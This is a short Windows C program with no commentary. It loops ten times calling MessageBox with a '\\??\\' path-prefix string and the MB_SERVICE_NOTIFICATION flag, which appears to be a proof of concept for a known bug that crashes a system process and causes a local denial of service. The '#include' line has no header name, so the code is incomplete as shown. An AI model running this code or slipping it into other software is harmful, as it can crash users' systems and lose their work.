#include int main(void){ int i; char bug1 [] ="\\??\\XXXX"; for(i = 0; i < 10; i ++) { MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION); } }